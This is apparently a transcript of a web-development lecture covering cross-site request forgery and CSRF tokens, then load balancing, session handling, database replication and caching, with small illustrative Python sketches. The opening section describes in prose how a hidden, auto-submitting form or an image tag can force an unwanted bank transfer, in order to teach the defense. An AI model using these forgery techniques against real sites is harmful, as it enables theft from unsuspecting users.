  • And if you go to that URL /transfer and then you provide arguments as to who

  • you're transferring money to and how much money you're transferring,

  • you can transfer money.

  • Might be a web request that allows you to do that.

  • Imagine some other website, some website where

  • hackers are trying to steal money, where they have code that

  • looks a little something like this.

  • They have a link that says, "Click Here!"

  • And when you click on the link, that takes you to yourbank.com/transfer

  • transferring to a particular person, transferring a particular amount.

  • And some unsuspecting user on this website could click the button.

  • And as a result, that takes them to their bank.

  • And if they happen to be logged into their bank at the time,

  • that could result in actually making that transfer.

  • So cross-site request forgery is the idea

  • that some other site can make a request on your site by, in this case,

  • linking to it.

  • This still isn't an amazing threat, because the person actually still needs

  • to click on the button in order to actually go

  • to yourbank.com/transfer/whatever.

  • But you can imagine that a clever hacker might be able to get around this

  • by doing something like this--

  • rendering an image, for example, and saying the source of the image

  • is going to be this.

  • And when the browser sees an image tag in the HTML, it is just going to go to that URL

  • and try and download that image.

  • It's going to go to the URL, try and fetch that resource.

  • And here, that resource is yourbank.com/transfer and then

  • transferring that money.

  • So the user doesn't even have to click on anything.

  • And by making a GET request to yourbank.com/transfer,

  • if yourbank.com isn't implemented particularly securely and just allows

  • you to go to a URL like this to transfer money, then that could be the result.

  • So how do you protect against this?

  • How would you protect against your website

  • being able to do something like this?

  • Because your website probably wants some way

  • of being able to transfer money if you have a bank application,

  • but you don't want to allow people to make requests like that.

  • Answer, yeah?

  • AUDIENCE: Yeah.

  • It's facetious.

  • BRIAN YU: Go for it.

  • AUDIENCE: You get a better bank.

  • BRIAN YU: Get a better bank.

  • OK.

  • Certainly something that would work.

  • Other thoughts?

  • Yeah?

  • AUDIENCE: Change the form request type so it's not literally in your own

  • [INAUDIBLE].

  • BRIAN YU: Yeah.

  • Change the form request type so that it's not literally here.

  • So this right here is a GET request.

  • You might imagine that instead, it's a form that's submitted by a POST,

  • like a POST request, a form that you actually

  • have to submit, click on a Submit button, in order to submit that form.

  • And so now, you could imagine that someone could still

  • create a vulnerability by doing something like this.

  • They have a form whose action is yourbank.com/transfer submitting

  • by a method POST.

  • And now, they have these inputs that are type hidden,

  • which are just input fields that don't show up inside of a page.

  • And they can have hidden input fields that

  • specify who it's to, what the amount is, and then just some button that says,

  • "Click Here!"

  • And if they click here, then unwittingly,

  • the user could be submitting a form to the bank that's

  • initiating some transfer.

  • And in fact, if the hacker is being particularly clever,

  • you don't even need the user to click anything,

  • because we can use event listeners to get around this.

  • I could say body onload--

  • in other words, when the body of the page is done loading,

  • run this JavaScript.

  • Document.forms returns an array of all the forms in the web document.

  • Square bracket 0 says get the first form.

  • And there's a function in JavaScript called .submit that submits a form.

  • So you can say, all right, get all the forms, get the first form,

  • and run submit.

  • And that's going to result in submitting this form,

  • making a POST request to yourbank.com/transfer,

  • which results in some amount being transferred.

  • So this is a potential vulnerability, as well.

  • If you're writing this bank application, you

  • don't want to allow code like this to be able to get through your security,

  • because that opens up a whole host of potential security vulnerabilities.

  • And in general, the way that people tend to deal

  • with this is by adding what's called a CSRF token, a Cross-Site Request

  • Forgery token, basically adding some special value that changes

  • into their own forms and then, anytime someone submits

  • the form, checking to make sure the value of that token

  • is, in fact, a valid token.

  • And that way, someone couldn't fake it because some other form

  • on some other hacker's website isn't going to have a valid CSRF

  • token inside of their form page.

  • And so larger scale web application frameworks, like Django,

  • offer easy ways to add CSRF tokens to your forms, as well.

  • But just something to be aware of as you begin

  • to think about, when you're designing a web application,

  • how could someone exploit it?

  • How could someone make requests on behalf of users

  • that they don't intend to in order to get

  • some malicious result to come about?

  • So lots of security things to be thinking about.

  • Questions about security or any of the security topics

  • that we've covered or talked about?

  • Yeah?

  • AUDIENCE: [INAUDIBLE] the token is generated [INAUDIBLE] event,

  • or it's a unique token for every user?

  • BRIAN YU: Yeah.

  • Imagine that in the case of CS50 Finance,

  • for instance, that when I click on the Buy page that takes me

  • to the page where I can buy stocks, my route for buy

  • is going to basically generate a new token

  • and insert it into the form that then gets displayed to me.

  • And then when I submit that form, it gets submitted back

  • to the same application.

  • And the application can then check.

  • Did the token that came back match the token that I inserted into the page?

  • And if they do, in fact, match, then that's

  • a way of sort of verifying that the user was actually

  • submitting the actual form and not some fake form

  • that they were tricked into submitting.
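
The generate-then-check flow described in this answer can be sketched as follows. This is a simplified illustration under stated assumptions, not how any particular framework implements it: `session` is a plain dictionary standing in for the server-side session, and `render_buy_form` and `is_valid_submission` are hypothetical names.

```python
import hmac
import secrets

# Hypothetical stand-in for the server-side session store.
session = {}


def render_buy_form() -> str:
    """Generate a fresh token, remember it in the session, embed it in the form."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return (
        '<form action="/buy" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<button type="submit">Buy</button>'
        "</form>"
    )


def is_valid_submission(form: dict) -> bool:
    """Accept the POST only if the submitted token matches the one we issued."""
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    # compare_digest avoids leaking information through comparison timing.
    return bool(expected) and hmac.compare_digest(
        expected.encode(), submitted.encode()
    )
```

A form hosted on another site has no way to learn the token stored in the user's session, so its hidden inputs can name a recipient and an amount but cannot supply a value that passes the check.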

  • All right.

  • In that case, let's switch gears a little bit,

  • and let's talk about scalability.

  • Here again, there's going to be even less code.

  • And the idea is just going to be, all right, what happens when

  • we begin to scale our web application?

  • We've got some web server, and we've got some users

  • that are using that web server, which we're going to represent as that line.

  • And so what happens when that server starts

  • to have more users that are all trying to use

  • the application at the same time?

  • What do we do?

  • Well, the first thing to probably do is figure out how many users

  • our website can actually support.

  • How many can it handle before it stops being able to support users?

  • And so this is where benchmarking is quite important.

  • Benchmarking is just this process by which we can test and sort of load test

  • our application to see what we can do to see how many users we could potentially

  • handle on our server.

  • And so what happens if we find out via benchmarking that,

  • OK, our server can only hold 100 users?

  • What if we need to support 101 users or 102 users?

  • What can we do?

  • One thing we can do is called vertical scaling, where the idea here

  • is, all right, we have a server.

  • And that server only supports 100 users.

  • All right, well, let's just get a bigger server, right?

  • Let's get a server that supports 200 users or 300 users.

  • And that's going to be able to better handle that load.

  • But there's a limit to this, right?

  • There's a limit to how much you can just increase the size of a server

  • and increase its ability to handle load.

  • And so what could you do to be able to handle more users?

  • AUDIENCE: More servers.

  • BRIAN YU: More servers.

  • Great.

  • And this is an idea called horizontal scaling, where

  • the idea is that we have some server.

  • And let's say, instead of having one server,

  • let's go ahead and have two servers that are running the exact same web

  • application.

  • And now, we have two servers that are able to run the application

  • and handle twice as many people.

  • What problems come about now, logistically?

  • User tries to access our website, and now what?

  • Yeah?

  • AUDIENCE: That means you could have a race condition situation

  • or how the servers communicate to each other [INAUDIBLE].

  • BRIAN YU: Yeah.

  • How do the servers communicate with each other?

  • Certainly, race conditions become a threat, as well.

  • And then a fundamental problem is a user comes to the site,

  • and which server do they go to, right?

  • We need some way of deciding which server to direct a particular user to.

  • And so generally, this is solved by adding yet another piece of hardware

  • into the mix, adding some load balancer in between the user

  • and the servers whereby a user, when they request the page,

  • rather than going straight to the server, they go to the load balancer

  • first.

  • And from there on, the load balancer can split people up,

  • say certain people go to this server, certain people go to that server,

  • and try and decide how it is that people are going to be

  • divided into the different servers.

  • And so how could a load balancer decide?

  • If there are five servers and a user comes along,

  • how should a load balancer decide which server to send a user to?

  • There is no one right answer to this.

  • There are a number of possible options, a number of different

  • what are called load balancing methods.

  • But how could you decide where to send a user?

  • Yeah?

  • AUDIENCE: The server with the least amount of users currently.

  • BRIAN YU: Sure.

  • The server with the fewest users currently, what's often

  • called the fewest connections load balancing method.

  • You try and figure out which server has the fewest people on it.

  • And whichever one has the fewest people on it, send the user there.

  • Definitely good for trying to make sure that each one has about an equal load,

  • but potentially computationally expensive.

  • You're doing a lot of calculation now, so there's a trade off.

  • Yeah?

  • AUDIENCE: You could just do it randomly.

  • BRIAN YU: You could do it randomly.

  • You could just generate a random number between 1 and 5

  • and randomly assign someone to a particular server.

  • Definitely something you could do.

  • Other things?

  • Certainly the random approach is quick.

  • It doesn't involve having to do any calculation across all

  • the different servers.

  • But if you're unlucky, you could end up putting

  • a lot of people on server number two and not many people on server number eight

  • or whatnot.

  • And so what else could we do?

  • Yeah?

  • AUDIENCE: Just set up a counter [INAUDIBLE].

  • BRIAN YU: Sure.

  • Some sort of counter.

  • If you only have two, you just alternate odd, even, odd, even.

  • Go to this server.

  • Go to that one.

  • If you've got eight, you just rotate amongst the eight--

  • 1, 2, 3, 4, 5, 6, 7, 8 and go back to 1.

  • And so these are probably three of the most common load balancing methods--

  • random choice, whereby you just pick a random server, direct the user there;

  • round robin, where we do exactly that, just basically go one up until the end

  • and then go back to server number one; and then fewest connections, whereby

  • you try and actually calculate which server currently

  • has the fewest number of people on it and then

  • try and direct the user to that one with the fewest connections.

  • There are other methods in addition to this,

  • but these are perhaps three of the most intuitive

  • where you can start to see their trade offs.

  • Depending upon the type of user experience

  • you want, depending on how computationally

  • expensive certain operations are, you might choose different load balancing

  • methods.
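
A minimal sketch of the three methods just named, assuming servers are identified by plain strings and that connection counts are already available as a dictionary. All names here are hypothetical; a real load balancer would track connections itself.

```python
import itertools
import random

servers = ["server1", "server2", "server3"]


def pick_random(servers, rng=random):
    """Random choice: cheap, but the load may end up uneven."""
    return rng.choice(servers)


def make_round_robin(servers):
    """Round robin: hand out servers in order, wrapping back to the first."""
    cycle = itertools.cycle(servers)
    return lambda: next(cycle)


def pick_fewest_connections(active):
    """Fewest connections: `active` maps server name -> current connection count."""
    return min(active, key=active.get)


next_server = make_round_robin(servers)
rotation = [next_server() for _ in range(4)]
least_busy = pick_fewest_connections({"server1": 12, "server2": 3, "server3": 7})
```

The trade-off shows up in what each function needs: random and round robin need nothing but the server list, while fewest connections needs up-to-date counts from every server before it can decide.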

  • Yeah?

  • AUDIENCE: [INAUDIBLE] benchmarking, and what are some common ways to do that?

  • BRIAN YU: Yeah, there are software tools that can do this.

  • There are a number of different ones-- the names are escaping me

  • at the moment--

  • where you can basically test on a particular URL

  • and get a sense for how well it's able to handle that load.

  • And if you have particular use cases, I can chat with you about that, as well.

  • So all right, let's imagine we have two servers now.

  • And every time a user makes an HTTP request

  • to a server, every time they request a page,

  • we direct them to one server or the other server using

  • one of these methods, either by choosing randomly or by round robin

  • or by figuring out which one currently has the fewest users connected to it

  • or is handling the fewest connections.

  • What can go wrong?

  • Whenever we're dealing with issues of scale, we just try and solve a problem

  • and figure out what new problems have arisen.

  • Yeah?

  • AUDIENCE: You only have five servers, and now you need six.

  • BRIAN YU: Yeah.

  • Certainly, if you only have five servers and suddenly you need six,

  • that could potentially become a problem, as well.

  • But let's even assume that we have enough servers.

  • We have five servers, and every time someone loads a page,

  • they get sent to a different server based on one of these methods.

  • What can still go wrong with the user experience?

  • And in particular, I'll give you a hint.

  • Let's think about sessions.

  • What can go wrong?

  • Remember, sessions were ways of storing information-- in our case,

  • inside of the server--

  • about the user's current interaction with the server.

  • It stored which user was logged in.

  • It stored the current state of the tic-tac-toe game.

  • It stored other information.

  • Yeah?

  • AUDIENCE: You have to pick one [INAUDIBLE].

  • BRIAN YU: Yeah, exactly.

  • If I initially load a page and I go to server one and some information

  • about me is stored in the session, like whether I'm logged in

  • or the current state of my game or something else,

  • and then I load another page and it takes

  • me to server four this time, well, now, that server

  • doesn't have access to the same session information

  • that server one had if the information about the session

  • was stored in the server.

  • And now, that information is lost.

  • So I could load a page, and suddenly, now, I'm

  • logged out of the page for no apparent reason

  • even though I've logged in just a moment ago.

  • And then I could go to another page, and maybe by chance,

  • I'm back to server one, and now I'm logged in again.

  • So strange things can begin to happen.

  • And so to solve that, what could we do?

  • How can we make sure that sessions are preserved

  • when the user is requesting pages?

  • Again, no one correct answer.

  • Multiple possibilities here.

  • How do we solve this problem?

  • Yeah?

  • AUDIENCE: Would there be any way to store the session on the load balancer?

  • BRIAN YU: Store the session on the load balancer.

  • That's a good idea.

  • And that will actually get me at the first idea here,

  • which is this idea of sticky sessions.

  • And this is slightly different.

  • Rather than store all the session information in the load balancer,

  • it just needs to store for this particular user which

  • server has their session information.

  • So if I went to server number one initially,

  • the load balancer will remember me based on my IP address, cookie, or whatever

  • and say, all right, next time I try and request a page,

  • let me direct them back to server number one, for instance.

  • That way, whenever I come back, I'm always going to go to the same place.
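
Sticky sessions as described here amount to a lookup table on the load balancer. The sketch below assumes the client is identified by some string, such as an IP address or cookie value, and that new clients are assigned round robin. The class and its names are hypothetical.

```python
import itertools


class StickyBalancer:
    """Remembers which server each client was first sent to."""

    def __init__(self, servers):
        self._next = itertools.cycle(servers)  # round robin for new clients
        self._assigned = {}  # client id (e.g. IP or cookie value) -> server

    def route(self, client_id):
        # Only pick a server the first time we see this client.
        if client_id not in self._assigned:
            self._assigned[client_id] = next(self._next)
        return self._assigned[client_id]


balancer = StickyBalancer(["server1", "server2"])
first = balancer.route("alice")
other = balancer.route("bob")
again = balancer.route("alice")
```

Note that the balancer stores only the client-to-server mapping, not the session contents, which stay on whichever server the client was first sent to.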

  • There are other ways to solve this problem, as well.

  • You could store session information in the database

  • that all the servers have access to.

  • You could store session information on the client side, whereby

  • it doesn't matter what server you go to, because all the session information is

  • inside the client.

  • So there are a number of ways to solve this problem,

  • but these generally fall under the heading of session-aware load

  • balancing.

  • Someone mentioned the problem of, OK, well, I have five servers,

  • but what happens when I need six?

  • To solve this in the world of cloud computing,

  • where nowadays most people don't maintain their own hardware

  • for their web applications, they just rent out

  • hardware on someone else's servers, for instance, on AWS, for instance,

  • use Amazon servers--

  • you can take advantage of auto scaling, which automatically will grow or shrink

  • the number of servers based upon load, whereby you could initially

  • have two servers.

  • But if more users come about and you need more,

  • we can add a third server into the mix.

  • More people come about, we need even more.

  • We add a fourth server.

  • And auto scaling goes in both directions.

  • So if suddenly we find, all right, we had a lot of load

  • at this particular peak time of the day but now there are

  • fewer users on the site, the auto load balancer can sort of say,

  • all right, we don't need four servers anymore.

  • Let's go back to three and then later on, if it needs doing,

  • go back up to four again.

  • And it can automatically, dynamically reconfigure the number of servers

  • in order to figure out what the optimal number is

  • given the number of users that are currently using the application.
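
One way to picture the scaling decision is as a function from current load to a server count. This is only an illustrative rule, not how any cloud provider's auto scaling is actually configured: the per-server capacity of 100 echoes the earlier benchmarking example, and the minimum and maximum bounds are assumptions.

```python
import math


def desired_server_count(active_users, users_per_server=100,
                         min_servers=2, max_servers=10):
    """Return how many servers to run for the current number of users."""
    # Enough servers to cover the load, rounded up...
    needed = math.ceil(active_users / users_per_server)
    # ...but never below the floor or above the ceiling we are willing to pay for.
    return max(min_servers, min(max_servers, needed))


quiet = desired_server_count(150)
peak = desired_server_count(350)
after_peak = desired_server_count(280)
```

Because the same rule is applied as load rises and falls, the count moves in both directions: up to four servers at the peak, back down to three once users leave.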

  • What happens, though, when one of the servers fails for some reason?

  • The server just dies, for instance.

  • The load balancer doesn't necessarily know about that.

  • And so if it's still directing people across four different servers,

  • it could direct users to that server that is no longer operational.

  • Any thoughts on how we might solve that problem?

  • Yeah?

  • AUDIENCE: Have the load balancer ping the server at determined intervals

  • to see if it's still there.

  • BRIAN YU: Yeah, some sort of ping to make sure

  • that the server is still there.

  • And often, one of the easiest ways that this is done

  • is via what's called a heartbeat, whereby each of the servers

  • gives off a heartbeat every fixed number of seconds or minutes, for instance,

  • whereby if every 10 seconds the server pings the heartbeat,

  • that gets sent to the load balancer.

  • If ever the load balancer doesn't hear the heartbeat from the server,

  • it can know that that server is no longer operational, and it can say,

  • all right, you know what?

  • Let's stop sending users there and only send users to the other three servers.
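
The heartbeat idea can be sketched as a table of last-seen times on the load balancer. The 10-second interval comes from the example above; treating a server as down after 30 seconds of silence is an assumption, and the class name is hypothetical. Times are passed in explicitly so the behavior is easy to follow.

```python
class HeartbeatMonitor:
    """Tracks when each server last reported in."""

    def __init__(self, servers, timeout=30.0):
        self.timeout = timeout  # assumed: seconds of silence before a server counts as down
        self.last_seen = {server: 0.0 for server in servers}

    def beat(self, server, now):
        """Record a heartbeat received from `server` at time `now`."""
        self.last_seen[server] = now

    def healthy(self, now):
        """Servers whose most recent heartbeat is within the timeout."""
        return [s for s, seen in self.last_seen.items()
                if now - seen <= self.timeout]


monitor = HeartbeatMonitor(["server1", "server2", "server3", "server4"])
for t in (10, 20, 30, 40, 50):
    for server in ("server1", "server2", "server3"):
        monitor.beat(server, now=t)
monitor.beat("server4", now=10)  # server4 stops sending after its first beat
alive = monitor.healthy(now=50)
```

The load balancer would then choose only among the servers in `alive`, which here leaves out `server4`.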

  • Questions about that or any of the ideas of how we scale our servers

  • to be able to handle load?

  • We decided, all right, if too many people are on one server,

  • we need to split up into two different servers.

  • But that introduced a bunch of problems that we

  • had to solve-- problems about load balancing, problems about what to do

  • about sessions, so on and so forth.

  • Yeah?

  • AUDIENCE: Do you hear a lot about distributed servers?

  • I'm wondering how they [INAUDIBLE].

  • BRIAN YU: Sure.

  • How do servers share data?

  • Well, they use databases.

  • And of course, as we start to figure out what to do with more and more servers,

  • we also need to figure out what to do about databases,

  • figure out how to scale databases and make sure that as we scale them,

  • the databases are able to handle that load, as well.

  • And so in the past, we've had, all right, a load balancer.

  • We've got servers.

  • And in our model right now, we have a database that both of these servers

  • are connected to.

  • But of course, the problem is soon going to arise of, all right,

  • now we've got a lot of servers that are all

  • trying to connect to the same database.

  • And now, we've got yet another single point

  • where things could potentially go wrong or where

  • we could potentially be overloaded.

  • So how do we solve this type of problem?

  • One of the most common ways is database partitioning.

  • One form of database partitioning you've, in fact, already seen,

  • and it's just an extension of what we've been doing with SQL,

  • whereby we have this flights table.

  • And we could say, all right, rather than store the origin and the origin code,

  • let's go ahead and separate what's in one table

  • into a couple different tables.

  • Let's separate the flights table into a locations table

  • where the locations table has a number for each possible location.

  • And then it also, in the flights table, now,

  • only needs to store a single number for the origin ID and the destination ID.
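
A sketch of that split using SQLite, as a rough reconstruction rather than the course's actual schema: the column names other than the origin and destination IDs, and the sample rows, are assumptions made for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE locations (
        id INTEGER PRIMARY KEY,
        code TEXT NOT NULL,
        name TEXT NOT NULL
    );
    CREATE TABLE flights (
        id INTEGER PRIMARY KEY,
        origin_id INTEGER NOT NULL REFERENCES locations(id),
        destination_id INTEGER NOT NULL REFERENCES locations(id),
        duration INTEGER NOT NULL
    );
    -- Hypothetical sample data.
    INSERT INTO locations (id, code, name) VALUES
        (1, 'JFK', 'New York'),
        (2, 'LHR', 'London');
    INSERT INTO flights (origin_id, destination_id, duration) VALUES (1, 2, 415);
""")

# Joining back to locations recovers the codes that flights no longer stores.
rows = conn.execute("""
    SELECT o.code, d.code, f.duration
    FROM flights AS f
    JOIN locations AS o ON o.id = f.origin_id
    JOIN locations AS d ON d.id = f.destination_id
""").fetchall()
```

Each flight row now carries two small integers instead of repeated city names and codes, at the cost of a join when the full details are needed.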

  • We could also separate tables in different ways.

  • If we have some general way we could partition

  • a table into different parts that are generally

  • going to be queried separately, then we can

  • do another partition where I could say, all right,

  • my flights table is getting big.

  • Let's split it up.

  • And all right, at my airline, the international departures and arrivals

  • are handled separately from the domestic departures and arrivals.

  • So no need for those to be in the same table.

  • Let me just go ahead and take flights and separate it

  • into a domestic flights table and an international flights table,

  • for instance.

  • One way to just partition things into two different tables that

  • could potentially be stored in different places that ultimately

  • allows for handling of scale.
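
The domestic and international split can be pictured as a routing rule applied to every insert. In this sketch, two in-memory lists stand in for tables that could live in different places; the field names and the rule for what counts as international are assumptions.

```python
# Hypothetical in-memory stand-ins for two separately stored tables.
tables = {"domestic_flights": [], "international_flights": []}


def table_for(flight):
    """Choose the partition from whether the flight crosses a border."""
    if flight["origin_country"] == flight["destination_country"]:
        return "domestic_flights"
    return "international_flights"


def insert_flight(flight):
    """Store the flight in whichever partition it belongs to."""
    tables[table_for(flight)].append(flight)


insert_flight({"origin_country": "US", "destination_country": "US", "code": "BOS-SFO"})
insert_flight({"origin_country": "US", "destination_country": "UK", "code": "JFK-LHR"})
```

This only pays off when queries usually touch one partition at a time, which is the condition stated above.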

  • But ultimately, all of these are problems

  • that are still going to lead to the fundamental problem of if I only

  • have one database and 10 or dozens of servers that are all

  • trying to communicate with that same database,

  • we're going to run into problems.

  • The database can only handle some fixed number of connections.

  • And so one solution to this is database replication.

  • So all right, how does database replication work?

  • Well, probably the simplest form of database replication

  • is what's called single primary replication, whereby

  • I have one what's called primary database and maybe

  • three databases in total, but only one that I'm

  • going to consider the primary one.

  • And you can read data from any of the databases.

  • You can get data out of any of the three databases,

  • whereby if there are three servers and each one wants to read data,

  • they can just share among the three databases reading data

  • to make sure that we're not overloading any one

  • database with too many connections.

  • But you can only write data to a single database.

  • And by only writing data to a single database,

  • that means that anytime this database is updated,

  • then this database, our primary database,

  • just needs to update the other two databases.

  • Say, all right, there's been a change made to the primary database.

  • And it's the primary database's responsibility

  • to then communicate to the other two databases what those changes are.

  • And so that's single-primary replication.
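
A toy model of single-primary replication, with dictionaries standing in for databases. It simplifies heavily: here the primary pushes each change to the other databases immediately, whereas a real system may propagate changes with some delay. The class and method names are hypothetical.

```python
import itertools


class SinglePrimaryCluster:
    """One writable primary plus read-only copies, modeled as dictionaries."""

    def __init__(self, replica_count=2):
        self.primary = {}
        self.replicas = [{} for _ in range(replica_count)]
        # Reads rotate across all three databases to spread the load.
        self._readers = itertools.cycle([self.primary, *self.replicas])

    def write(self, key, value):
        # Writes are only ever applied to the primary...
        self.primary[key] = value
        # ...which is then responsible for updating the other databases.
        for replica in self.replicas:
            replica[key] = value

    def read(self, key):
        return next(self._readers).get(key)


cluster = SinglePrimaryCluster()
cluster.write("flight:1", "on time")
reads = [cluster.read("flight:1") for _ in range(3)]
```

Three consecutive reads are served by three different databases, but every write still funnels through the single primary.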

  • Yeah?

  • AUDIENCE: How is that more efficient than just communicating with all three

  • of them?

  • Because I think you're sending information

  • from the first database to the second and third.

  • [INAUDIBLE] information sent that's just rewriting to all three of them.

  • BRIAN YU: That's true, though

  • databases could potentially batch information

  • together into transactions and things and groups

  • so as to be a little bit more efficient.

  • So certainly ways around that problem.

  • But yeah, a good point.

  • Of course, this helps the read problem.

  • It makes it easier to be able to read data out of databases.

  • But it leaves open a potential vulnerability

  • or a potential scalability problem with regard to writing data,

  • because there is still only a single database on which I can actually

  • write data to if that one database is responsible for updating

  • all of the other databases.

  • And so a more complex version of this is what's

  • known as multi-primary replication, where

  • the idea is that each database can be read from and written to.

  • But now, updates get a lot more complicated.

  • All of the databases need to have some notion and some way

  • of being able to update each other.

  • And there, conflicts begin to arise.

  • You can have update conflicts where two different databases

  • have updated the same row.

  • All right, how do you resolve that problem?

  • You can have uniqueness conflicts, whereby

  • if you add a row to each of two databases at the same time, maybe

  • they get the same ID.

  • Maybe this one only has 27 rows, so this database

  • adds a new row with ID number 28, and this database does the same thing.

  • And now, when they try to update each other,

  • we have two rows with the same ID.

  • And now, we need some way of resolving those,

  • because the IDs are supposed to be unique.

  • And so that can create problems, as well.

  • And then there are other types of conflicts, too-- delete conflicts,

  • whereby one database tries to delete a row at the same time

  • another database tries to update a row.

  • So which do you do?

  • Do you update the row?

  • Do you delete the row?

  • And so these are all conflicts that when you're setting up

  • a multi-primary replication system, you need

  • to figure out how you're going to ultimately resolve those conflicts.

  • You gain the ability to write to all the databases,

  • but new problems arise as you begin to do that.
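
The uniqueness conflict from the 27-row example can be reproduced in a few lines. Dictionaries keyed by row ID stand in for the two databases, and the function names are hypothetical. The sketch only detects the conflict; deciding how to resolve it is the hard part and is left open, as it is above.

```python
def insert_row(db, data):
    """Assign the next free ID the way an auto-incrementing key would."""
    new_id = max(db, default=0) + 1
    db[new_id] = data
    return new_id


def uniqueness_conflicts(db_a, db_b):
    """IDs that both databases use for different rows."""
    return sorted(i for i in db_a.keys() & db_b.keys() if db_a[i] != db_b[i])


# Both databases start in sync with 27 rows.
shared = {i: f"row {i}" for i in range(1, 28)}
db_a, db_b = dict(shared), dict(shared)

# Each accepts a write before hearing about the other's.
id_a = insert_row(db_a, "written to A")
id_b = insert_row(db_b, "written to B")
conflicts = uniqueness_conflicts(db_a, db_b)
```

Both inserts are locally valid, and the problem only appears when the two databases try to update each other.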

  • Yeah?

  • AUDIENCE: So is the information in each database the same?

  • Are they [INAUDIBLE] with each other?

  • BRIAN YU: Yeah.

  • In this model, the databases in general are

  • going to be the same, though they're not always perfectly going

  • to be in sync, which is yet another problem, whereby there might

  • be some time after I write to this database

  • before that data propagates through all of the databases, for instance.

  • AUDIENCE: So why not keep it in one?

  • BRIAN YU: You could keep all the information in one database.

  • But a single database server can only handle so many connections.

  • And so you might imagine that having three different servers, three

  • different computers that are all able to handle incoming requests,

  • just increases the capacity of your application

  • to be able to handle that kind of load.

  • All right.

  • Questions about databases, database replication, any of the scale problems

  • that come about there?

  • All right.

  • Final thing I'll mention on the topic of scaling that can be helpful

  • is just the idea of caching.

  • Caching is something we've talked about a lot before.

  • But a general idea could be that in order to try and solve this problem

  • of constantly having to request information from the database,

  • if we could store data in some other place-- in particular,

  • inside of a cache--

  • then we don't need to access the database as often, because we've

  • got the information already stored.

  • And so one way to do this is via client-side caching.

  • And so inside of the HTTP headers, when an HTTP response

  • is sending back information to a user, you

  • can add an HTTP header called Cache-Control that basically

  • says for up to this number of seconds, you can just store information

  • about this page and not request it again if you try

  • and request the page for a second time.

  • And this helps to make sure that if the browser tries to request

  • the page again, it doesn't need to.

  • It can just use the version that's stored inside of the cache.
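
A small sketch of the idea, assuming the `max-age` directive is used to express the number of seconds. The one-day value and the helper names are illustrative, and real browsers apply more rules than this single check.

```python
def cache_control_header(max_age_seconds):
    """Header a response could carry to allow reuse for a limited time."""
    return ("Cache-Control", f"max-age={max_age_seconds}")


def is_fresh(stored_at, now, max_age_seconds):
    """True while the cached copy is younger than max-age."""
    return now - stored_at < max_age_seconds


header = cache_control_header(86400)  # assumed: allow reuse for one day
reuse_after_an_hour = is_fresh(stored_at=0, now=3600, max_age_seconds=86400)
reuse_after_25_hours = is_fresh(stored_at=0, now=90000, max_age_seconds=86400)
```

While the copy is fresh, the browser makes no request at all, so neither the server nor the database does any work for that page view.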

  • And a more recent development is this idea of an ETag, or an entity tag.

  • And the idea here is that if we have some web resource, some document,

  • some piece of data from a database that our web application is sending out

  • to users, when I send users that resource, that document,

  • I'll send that document, and I'll also send an entity tag that

  • corresponds to that particular version of the document

  • and send them both to the user.

  • And imagine this is a big document.

  • It's a lot of data, so it's expensive to query and to send to the user.

  • The next time the user tries to request this page, what the user can do

  • is the user can send the entity tag, the ETag, along with their request.

  • I would like to request this resource, and, oh, by the way,

  • I already have this version of the entity stored

  • locally inside of my computer's cache.

  • And if the web application then looks at that ETag and says,

  • all right, you know what?

  • That's the latest version of the document.

  • The web application can just respond--

  • in particular, with an HTTP status code of 304, meaning not modified,

  • to just say, you know what?

  • This entity tag is the most recent entity tag.

  • Don't bother trying to request the document again.

  • Just use the version you saved locally in your cache.

  • And if, on the off chance, the document's been updated

  • and therefore has a new ETag value, then the web application

  • goes through the process of sending that entire document back to the user.

  • But by taking advantage of technologies like this,

  • this can allow us to make sure that we're not

  • making too many requests to the database,

  • that we don't make redundant requests if a particular resource hasn't changed.
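
The ETag exchange described above can be sketched as follows. The sketch assumes the tag is a hash of the document body and that the client sends it back in the standard `If-None-Match` request header. The function names are hypothetical. To avoid loading the document at all, a real application might instead derive the tag from a version number or a last-modified timestamp.

```python
import hashlib


def make_etag(body: bytes) -> str:
    """Derive a tag that changes whenever the document's content changes."""
    return '"' + hashlib.sha256(body).hexdigest()[:16] + '"'


def respond(body: bytes, request_headers: dict) -> tuple:
    """Return (status, headers, body) for a request for the given document."""
    etag = make_etag(body)
    if request_headers.get("If-None-Match") == etag:
        # The client already holds this version: 304 Not Modified, no body sent.
        return 304, {"ETag": etag}, b""
    # First request, or the document has changed: send the whole document.
    return 200, {"ETag": etag}, body


document = b"a large, expensive document"
status, headers, payload = respond(document, {})
repeat_status, _, repeat_payload = respond(
    document, {"If-None-Match": headers["ETag"]}
)
```

The second call returns status 304 with an empty body, so the large document is only sent again once its content, and therefore its tag, changes.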

  • So caching can be done on the client side.

  • Caching can also be done on the server side, which

  • changes our diagram slightly so as to look a little bit more

  • like this, whereby now, we've got some more complications here.

  • We've got some load balancer that's communicating

  • with a bunch of different servers.

  • All of those servers have to interact with the database,

  • and maybe you've got multiple databases going on here that are each able to do

  • reads and writes, either in a single-primary model

  • or a multi-primary model.

  • And those servers also have access to some cache that makes it easier

  • to access data quickly, in a sense, saying,

  • if there's some expensive database query,

  • don't bother performing the database query again and again and again.

  • Take the results of that database query once.

  • Save it inside of the cache.

  • And from then on, the server can just look to the cache

  • and get information out of there.
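
A minimal sketch of this server-side pattern, using an in-memory dictionary as the cache. The `QueryCache` class is hypothetical. The expiry time (`ttl_seconds`) is an added assumption, not something the lecture specifies. It is there so that stale results are eventually refreshed.

```python
import time


class QueryCache:
    """Hypothetical in-memory cache for the results of expensive queries."""

    def __init__(self, ttl_seconds: float, clock=time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock
        self._entries = {}  # key -> (expires_at, value)

    def get_or_compute(self, key, compute):
        """Return the cached value for key, calling compute() only on a miss."""
        now = self._clock()
        entry = self._entries.get(key)
        if entry is not None and now < entry[0]:
            return entry[1]  # cache hit: the database is not touched
        value = compute()  # cache miss: run the expensive query once
        self._entries[key] = (now + self._ttl, value)
        return value


calls = []


def expensive_query():
    """Stand-in for a slow database query; records each time it runs."""
    calls.append(1)
    return ["row1", "row2"]


cache = QueryCache(ttl_seconds=30)
first = cache.get_or_compute("all_rows", expensive_query)
second = cache.get_or_compute("all_rows", expensive_query)
```

Both calls return the same rows, but `expensive_query` runs only once. In a deployment with several servers, the cache would typically be a shared service rather than a per-process dictionary.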

  • So lot of security and scalability concerns

  • that can potentially come about as you begin web application development.

  • And so goal of today was really just to give you

